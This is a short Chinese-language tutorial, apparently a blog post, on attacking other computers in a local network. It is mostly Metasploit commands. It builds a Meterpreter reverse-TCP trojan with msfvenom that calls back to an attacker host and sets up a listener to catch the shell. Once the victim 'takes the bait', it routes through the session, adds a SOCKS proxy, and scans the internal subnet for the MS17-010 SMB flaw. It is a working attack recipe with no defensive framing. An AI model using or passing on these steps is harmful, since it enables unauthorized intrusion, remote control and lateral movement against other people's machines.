攻击其他局域网内的电脑
文章目录
前言
提示:
123
一、生成木马
1.生成木马
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.55 LPORT=4444 -b "\x00" -f elf -o feixiang
2.设置监听
use exploit/multi/handler
3.设置reverse payload
exploit(multi/handler) >
set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) >set LHOST 192.168.0.55
msf6 exploit(multi/handler) >set LPORT 4444
msf6 exploit(multi/handler)run
二、等待目标机上钩之后
1.把meterpreter 保存到后台
background
查看路由信息
route
2.添加一条路由转发
route add 192.168.110.111 255.255.255.0 1
1:是sessions
配置完路由实际上就可以访问目标了。
三、配置 socks 代理
use auxiliary/server/socks_proxy #启动代理
run
vim /etc/proxychains4.conf #更改代理文件
socks5 192.168.0.55 1080 #添加一行
1080 跟socks_proxy 的 srvport
对应
2.通过代理扫描内网。
└─# proxychains nmap -Pn -sT -p 445 --script=smb-vuln-ms17-010.nse 192.168.110.0/24
3.通过代理启动 msf
└─ proxychains msfdb run
--------------容易遇到的问题--------------
添加 firewall-cmd --zone=public --add-port=80/tcp --permanent
(–permanent永久生效,没有此参数重启后失效)
重新载入 firewall-cmd --reload
查看 firewall-cmd --zone=public --query-port=80/tcp
删除 firewall-cmd --zone=public --remove-port=80/tcp --permanent